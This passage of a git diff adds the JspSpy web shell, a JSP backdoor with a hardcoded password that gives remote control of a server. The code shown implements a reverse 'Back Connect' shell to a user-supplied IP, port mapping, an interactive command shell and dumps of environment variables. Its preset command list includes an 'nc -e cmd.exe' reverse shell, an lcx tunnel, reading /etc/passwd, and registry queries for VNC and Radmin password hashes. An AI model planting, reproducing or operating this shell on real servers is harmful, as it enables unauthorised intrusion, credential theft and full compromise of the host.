+int len = input.read(b);   
+while (len != -1) {   
+output.write(b, 0, len);   
+len = input.read(b);   
+}   
+} catch (Exception ex) {
+} finally {
+try {
+if (output != null)
+output.close();
+if (input != null)
+input.close();
+} catch (Exception ex1) {
+}
+}
+}
+file.close();
+JSession.setAttribute(MSG,"Unzip File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VMapPort
+private static class VmpInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object localIP = JSession.getAttribute("localIP");
+Object localPort = JSession.getAttribute("localPort");
+Object remoteIP = JSession.getAttribute("remoteIP");
+Object remotePort = JSession.getAttribute("remotePort");
+Object done = JSession.getAttribute("done");
+
+JSession.removeAttribute("localIP");
+JSession.removeAttribute("localPort");
+JSession.removeAttribute("remoteIP");
+JSession.removeAttribute("remotePort");
+JSession.removeAttribute("done");
+
+if (Util.isEmpty(localIP))
+localIP = InetAddress.getLocalHost().getHostAddress();
+if (Util.isEmpty(localPort))
+localPort = "3389";
+if (Util.isEmpty(remoteIP))
+remoteIP = "www.forjj.com";
+if (Util.isEmpty(remotePort))
+remotePort = "80";
+if (!Util.isEmpty(done))
+Util.outMsg(out,done.toString());
+
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<input type=\"hidden\" name=\"o\" value=\"mapPort\">"+
+"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td><h2 id=\"Bin_H2_Title\">PortMap &gt;&gt;</h2>"+
+"      <div id=\"hOWTm\">"+
+"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"      <tr align=\"center\">"+
+"        <td style=\"width:5%\"></td>"+
+"        <td style=\"width:20%\" align=\"left\">Local Ip :"+
+"          <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+localIP+"\" />"+
+"          </td>"+
+"        <td style=\"width:20%\" align=\"left\">Local Port :"+
+"          <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+localPort+"\" /></td>"+
+"        <td style=\"width:20%\" align=\"left\">Remote Ip :"+
+"          <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+remoteIP+"\" /></td>"+
+"        <td style=\"width:20%\" align=\"left\">Remote Port :"+
+"          <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""+remotePort+"\" /></td>"+
+"      </tr>"+
+"      <tr align=\"center\">"+
+"        <td colspan=\"5\"><br/>"+
+"          <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"+
+"			<input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"+SHELL_NAME+"?o=smp'\" class=\"bt\" />"+
+"    </td>"+
+"    </tr>"+
+"	</table>"+
+"    </div>"+
+"</td>"+
+"</tr>"+
+"</table>"+
+"</form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//StopMapPort
+private static class SmpInvoker extends DefaultInvoker {
+public boolean doAfter(){return true;}
+public boolean doBefore(){return true;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP);
+server.close();
+}
+JSession.setAttribute("done","Stop Success!");
+ins.get("vmp").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MapPortInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String localIP = request.getParameter("localIP");
+String localPort = request.getParameter("localPort");
+final String remoteIP = request.getParameter("remoteIP");
+final String remotePort = request.getParameter("remotePort");
+if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
+return;
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket s = (ServerSocket)obj;
+s.close();
+}
+final ServerSocket server = new ServerSocket();
+server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort)));
+JSession.setAttribute(PORT_MAP,server);
+new Thread(new Runnable(){
+public void run(){
+while (true) {
+Socket soc = null;
+Socket remoteSoc = null;
+DataInputStream remoteIn = null;
+DataOutputStream remoteOut = null;
+DataInputStream localIn = null;
+DataOutputStream localOut = null;
+try{
+soc = server.accept();
+remoteSoc = new Socket();
+remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort)));
+remoteIn = new DataInputStream(remoteSoc.getInputStream());
+remoteOut = new DataOutputStream(remoteSoc.getOutputStream());
+localIn = new DataInputStream(soc.getInputStream());
+localOut = new DataOutputStream(soc.getOutputStream());
+this.readFromLocal(localIn,remoteOut);
+this.readFromRemote(soc,remoteSoc,remoteIn,localOut);
+}catch(Exception ex)
+{								
+break;
+}
+}
+}
+public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){
+new Thread(new Runnable(){
+public void run(){
+while (true) {
+try{
+byte[] data = new byte[100];
+int len = localIn.read(data);
+while (len != -1) {
+remoteOut.write(data,0,len);
+len = localIn.read(data);
+}
+}catch (Exception e) {
+break;
+}
+}
+}
+}).start();
+}
+public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){
+new Thread(new Runnable(){
+public void run(){
+while(true) {
+try{
+byte[] data = new byte[100];
+int len = remoteIn.read(data);
+while (len != -1) {
+localOut.write(data,0,len);
+len = remoteIn.read(data);
+}
+}catch (Exception e) {
+try{
+soc.close();
+remoteSoc.close();
+}catch(Exception ex) {
+}
+break;
+}
+}
+}
+}).start();
+}
+}).start();
+JSession.setAttribute("done","Map Port Success!");
+JSession.setAttribute("localIP",localIP);
+JSession.setAttribute("localPort",localPort);
+JSession.setAttribute("remoteIP",remoteIP);
+JSession.setAttribute("remotePort",remotePort);
+response.sendRedirect(SHELL_NAME+"?o=vmp");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VBackConnect
+private static class VbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object ip = JSession.getAttribute("ip");
+Object port = JSession.getAttribute("port");
+Object program = JSession.getAttribute("program");
+Object done = JSession.getAttribute("done");
+JSession.removeAttribute("ip");
+JSession.removeAttribute("port");
+JSession.removeAttribute("program");
+JSession.removeAttribute("done");
+if (Util.isEmpty(ip))
+ip = request.getRemoteAddr();
+if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
+port = "4444";
+if (Util.isEmpty(program))
+program = "cmd.exe";
+if (!Util.isEmpty(done))
+Util.outMsg(out,done.toString());
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<input type=\"hidden\" name=\"o\" value=\"backConnect\">"+
+"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"+
+"      <div id=\"hOWTm\">"+
+"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"      <tr align=\"center\">"+
+"        <td style=\"width:5%\"></td>"+
+"        <td  align=\"center\">Your Ip :"+
+"          <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""+ip+"\" />"+
+"          Your Port :"+
+"          <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""+port+"\" />Program To Back :"+
+"          <input name=\"program\" id=\"program\" type=\"text\" value=\""+program+"\" class=\"input\" size=\"20\" value=\"d\" /></td>"+
+"      </tr>"+
+"      <tr align=\"center\">"+
+"        <td colspan=\"2\"><br/>"+
+"          <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"+
+"    </td>"+
+"    </tr>"+
+"	</table>"+
+"    </div>"+
+"</td>"+
+"</tr>"+
+"</table>"+
+"</form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BackConnectInvoker extends DefaultInvoker {
+public boolean doAfter(){return false;}
+public boolean doBefore(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String ip = request.getParameter("ip");
+String port = request.getParameter("port");
+String program = request.getParameter("program");
+if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port))
+return;
+Socket socket = new Socket(ip,Integer.parseInt(port));
+Process process = Runtime.getRuntime().exec(program);
+(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
+(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
+JSession.setAttribute("done","Back Connect Success!");
+JSession.setAttribute("ip",ip);
+JSession.setAttribute("port",port);
+JSession.setAttribute("program",program);
+response.sendRedirect(SHELL_NAME+"?o=vbc");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class JspEnvInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"      <tr>"+
+"        <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"+
+"          <div id=\"ghaB\">"+
+"            <hr style=\" border: 1px solid #ddd;height:0px;\"/>"+
+"            <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+Properties pro = System.getProperties();
+Enumeration names = pro.propertyNames();
+while (names.hasMoreElements()){
+String name = (String)names.nextElement();
+out.println("<li><u>"+Util.htmlEncode(name)+" : </u>"+Util.htmlEncode(pro.getProperty(name))+"</li>");
+}
+out.println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr style=\" border: 1px solid #ddd;height:0px;\"/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+Map<String,String> envs = System.getenv();
+Set<Map.Entry<String,String>> entrySet = envs.entrySet();
+for (Map.Entry<String,String> en:entrySet) {
+out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
+}
+out.println("</ul></div></td>"+
+"      </tr>"+
+"    </table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class TopInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" name=\"doForm\"></form>"+
+"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"+
+"	<tr class=\"head\">"+
+"		<td><span style=\"float:right;\"><a href=\"http://www.forjj.com\" target=\"_blank\">JspSpy Ver: 2009</a></span>"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")</td>"+
+"	</tr>"+
+"	<tr class=\"alt1\">"+
+"		<td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "+
+"			<a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "+
+"			<a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "+
+"			<a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "+
+"			<a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "+
+"			<a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "+
+"			<a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "+
+"			<a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "+
+"			<a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "+
+"			<a href=\"javascript:doPost({o:'vRemoteControl'});\">Remote Control</a> | "+
+"			<a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "+
+"			<a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "+
+"	</tr>"+
+"</table>");
+if (JSession.getAttribute(MSG) != null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+} 
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VOnLineShellInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script>"+
+"				function $(id) {"+
+"					return document.getElementById(id);"+
+"				}"+
+"				var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"+
+"				window.onload = function(){"+
+"					setInterval(function(){"+
+"						if ($(\"autoscroll\").checked)"+
+"						{"+
+"							var f = window.frames[\"echo\"];"+
+"							if (f && f.document && f.document.body)"+
+"							{"+
+"								if (!ie)"+
+"								{"+
+"									if (f.document.body.offsetHeight)"+
+"									{"+
+"										f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"+
+"									}"+
+"								} else {"+
+"									f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"+
+"								}"+
+"							}"+
+"						}"+
+"					},500);"+
+"				}"+
+"			</script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>");
+out.println("<h2>Shell OnLine &raquo;</h2><br/>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"+
+"			<input type=\"submit\" value=\" start \" class=\"bt\">"+
+"				<input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\"c:\\windows\\system32\\cmd.exe\"/>"+
+"				<input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo</span>"+
+"			</form>"+
+"			<hr/>"+
+"				<iframe class=\"secho\" name=\"echo\" src=\"\">"+
+"				</iframe>"+
+"				<form action=\""+SHELL_NAME+"\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"+
+"					<input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:80%\">"+
+"					<input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"+
+"					<select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"+
+"						<option value=\"\" selected> </option>"+
+"						<option value=\"uname -a\">uname -a</option>"+
+"						<option value=\"cat /etc/issue\">issue</option>"+
+"						<option value=\"cat /etc/passwd\">passwd</option>"+
+"						<option value=\"netstat -an\">netstat -an</option>"+
+"						<option value=\"net user\">net user</option>"+
+"						<option value=\"tasklist\">tasklist</option>"+
+"						<option value=\"tasklist /svc\">tasklist /svc</option>"+
+"						<option value=\"net start\">net start</option>"+
+"						<option value=\"net stop policyagent /yes\">net stop</option>"+
+"						<option value=\"nbtstat -A IP\">nbtstat -A</option>"+
+"						<option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"+
+"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"+
+"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"+
+"						<option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"+
+"						<option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"+
+"						<option value=\"systeminfo\">systeminfo</option>"+
+"						<option value=\"net localgroup\">view groups</option>"+
+"						<option value=\"net localgroup administrators\">view admins</option>"+
+"					</select>"+
+"					<input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"+
+"					<input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"+
+"				</form>"+
+"			<iframe style=\"display:none\" name=\"asyn\"></iframe>"
+);
+out.println("    </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class OnLineInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String type = request.getParameter("type");
+if (Util.isEmpty(type))
+return;
+if (type.toLowerCase().equals("start")) {
+String exe = request.getParameter("exe");
+if (Util.isEmpty(exe))
+return;
+Process pro = Runtime.getRuntime().exec(exe);
+ByteArrayOutputStream outs = new ByteArrayOutputStream();
+response.setContentLength(100000000);
+response.setContentType("text/html;charset="+Charset.defaultCharset().name());
+OnLineProcess olp = new OnLineProcess(pro);
+JSession.setAttribute(SHELL_ONLINE,olp);
+new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
+new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
+new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//閿欒淇℃伅娴併��
+Thread.sleep(1000 * 60 * 60 * 24);
+} else if (type.equals("ecmd")) {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+String cmd = request.getParameter("cmd");
+if (Util.isEmpty(cmd))
+return;
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.setCmd(cmd);
+} else {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.stop();
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+
+static{
+ins.put("script",new ScriptInvoker());
+ins.put("before",new BeforeInvoker());
+ins.put("after",new AfterInvoker());
+ins.put("deleteBatch",new DeleteBatchInvoker());
+ins.put("clipboard",new ClipBoardInvoker());
+ins.put("vRemoteControl",new VRemoteControlInvoker());
+ins.put("gc",new GcInvoker());
+ins.put("vPortScan",new VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}					
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","<br/>"),"left");
+bout.close();
+out.flush();
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+%>
\ No newline at end of file
diff --git a/jsp/JspSpy1.jsp b/jsp/JspSpy1.jsp
new file mode 100644
index 0000000..f167745
--- /dev/null
+++ b/jsp/JspSpy1.jsp
@@ -0,0 +1,2344 @@
+锘�<%@page pageEncoding="utf-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+/**
+* Code By Ninty
+* Date 2009-12-17
+* Blog http://www.Forjj.com/
+* Yue . I Love You.
+*/
+private static final String PW = "ninty"; //password
+private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+private static final String REQUEST_CHARSET = "ISO-8859-1";
+private static final String PAGE_CHARSET = "UTF-8";
+private static final String CURRENT_DIR = "currentdir";
+private static final String MSG = "SHOWMSG";
+private static final String PORT_MAP = "PMSA";
+private static final String DBO = "DBO";
+private static final String SHELL_ONLINE = "SHELL_ONLINE";
+private static String SHELL_NAME = "";
+private static String WEB_ROOT = null; 
+private static String SHELL_DIR = null;
+public static Map<String,Invoker> ins = new HashMap<String,Invoker>();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
+Class.forName(driver);
+if (connect)
+this.conn = DriverManager.getConnection(url,uid,pwd);
+this.url = url;
+this.driver = driver;
+this.uid = uid;
+this.pwd = pwd;
+}
+public void connect() throws Exception{
+this.conn = DriverManager.getConnection(url,uid,pwd);
+}
+public Object execute(String sql) throws Exception {
+if (isValid()) {
+stmt = conn.createStatement();
+if (stmt.execute(sql)) {
+return stmt.getResultSet();
+} else {
+return stmt.getUpdateCount();
+}
+}
+throw new Exception("Connection is inValid.");
+}
+public void closeStmt() throws Exception{
+if (this.stmt != null)
+stmt.close();
+}
+public boolean isValid() throws Exception {
+return conn != null && !conn.isClosed();
+}
+public void close() throws Exception {
+if (isValid()) {
+closeStmt();
+conn.close();
+}
+}
+public boolean equals(Object o) {
+if (o instanceof DBOperator) {
+DBOperator dbo = (DBOperator)o;
+return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+}
+return false;
+}
+}
+private static class StreamConnector extends Thread {
+private InputStream is;
+private OutputStream os;  
+public StreamConnector( InputStream is, OutputStream os ){
+this.is = is;
+this.os = os;
+}			  
+public void run(){
+BufferedReader in  = null;
+BufferedWriter out = null;
+try{
+in  = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[8192];
+int length;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+out.write( buffer, 0, length );
+out.flush();
+}
+} catch(Exception e){}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){}
+}
+}
+private static class OnLineProcess {
+private String cmd = "first";
+private Process pro;
+public OnLineProcess(Process p){
+this.pro = p;
+}
+public void setPro(Process p) {
+this.pro = p;
+}
+public void setCmd(String c){
+this.cmd = c;
+}
+public String getCmd(){
+return this.cmd;
+}
+public Process getPro(){
+return this.pro;
+}
+public void stop(){
+this.pro.destroy();
+}
+}
+private static class OnLineConnector extends Thread {
+private OnLineProcess ol = null;
+private InputStream is;
+private OutputStream os;
+private String name;
+public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
+this.is = is;
+this.os = os;
+this.name = name;
+this.ol = ol;
+}
+public void run(){
+BufferedReader in  = null;
+BufferedWriter out = null;
+try{
+in  = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[128];
+if(this.name.equals("exeRclientO")) {
+//from exe to client
+int length = 0;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+String str = new String(buffer, 0, length);
+str = str.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");
+str = str.replace(""+(char)13+(char)10,"<br/>");
+str = str.replace("\n","<br/>");
+out.write(str.toCharArray(), 0, str.length());
+out.flush();
+}
+} else {
+//from client to exe
+while(true) {
+while(this.ol.getCmd() == null) {
+Thread.sleep(500);
+}
+if (this.ol.getCmd().equals("first")) {
+this.ol.setCmd(null);
+continue;
+}
+this.ol.setCmd(this.ol.getCmd() + (char)10);
+char[] arr = this.ol.getCmd().toCharArray();
+out.write(arr,0,arr.length);
+out.flush();
+this.ol.setCmd(null);
+}
+}
+} catch(Exception e){
+}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){
+}
+}
+}
+private static class Table{
+private ArrayList<Row> rows = null;
+private boolean echoTableTag = false;
+public void setEchoTableTag(boolean v) {
+this.echoTableTag = v;
+}
+public Table(){
+this.rows = new ArrayList<Row>();
+}
+public void addRow(Row r) {
+this.rows.add(r);
+}
+public String toString(){
+StringBuilder html = new StringBuilder();
+if (echoTableTag)
+html.append("<table>");
+for (Row r:rows) {
+html.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
+for (Column c:r.getColumns()) {
+html.append("<td nowrap>");
+String vv = Util.htmlEncode(Util.getStr(c.getValue()));
+if (vv.equals(""))
+vv = "&nbsp;";
+html.append(vv);
+html.append("</td>");
+}
+html.append("</tr>");
+}
+if (echoTableTag)
+html.append("</table>");
+return html.toString();
+}
+}
+private static class Row{
+private ArrayList<Column> cols = null;
+public Row(){
+this.cols = new ArrayList<Column>();
+}
+public void addColumn(Column n) {
+this.cols.add(n);
+}
+public ArrayList<Column> getColumns(){
+return this.cols;
+}
+}
+private static class Column{
+private String value;
+public Column(String v){
+this.value = v;
+}
+public String getValue(){
+return this.value;
+}
+}
+private static class Util{
+public static boolean isEmpty(String s) {
+return s == null || s.trim().equals("");
+}
+public static boolean isEmpty(Object o) {
+return o == null || isEmpty(o.toString());
+}
+public static String getSize(long size,char danwei) {
+if (danwei == 'M') {
+double v =  formatNumber(size / 1024.0 / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'G');
+}else {
+return v + "M";
+}
+} else if (danwei == 'G') {
+return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
+} else if (danwei == 'K') {
+double v = formatNumber(size / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'M');
+} else {
+return v + "K";
+}
+} else if (danwei == 'B') {
+if (size > 1024) {
+return getSize(size,'K');
+}else {
+return size + "B";
+}
+}
+return ""+0+danwei;
+}
+public static double formatNumber(double value,int l) {
+NumberFormat format = NumberFormat.getInstance();
+format.setMaximumFractionDigits(l);
+format.setGroupingUsed(false);
+return new Double(format.format(value));
+}
+public static boolean isInteger(String v) {
+if (isEmpty(v))
+return false;
+return v.matches("^\\d+$");
+}
+public static String formatDate(long time) {
+SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
+return format.format(new java.util.Date(time));
+}
+public static String convertPath(String path) {
+return path != null ? path.replace("\\","/") : "";
+}
+public static String htmlEncode(String v) {
+if (isEmpty(v))
+return "";
+return v.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");
+}
+public static String getStr(String s) {
+return s == null ? "" :s;
+}
+public static String getStr(Object s) {
+return s == null ? "" :s.toString();
+}
+public static String exec(String regex, String str, int group) {
+Pattern pat = Pattern.compile(regex);
+Matcher m = pat.matcher(str);
+if (m.find())
+return m.group(group);
+return null;
+}
+public static void outMsg(Writer out,String msg) throws Exception {
+outMsg(out,msg,"center");
+}
+public static void outMsg(Writer out,String msg,String align) throws Exception {
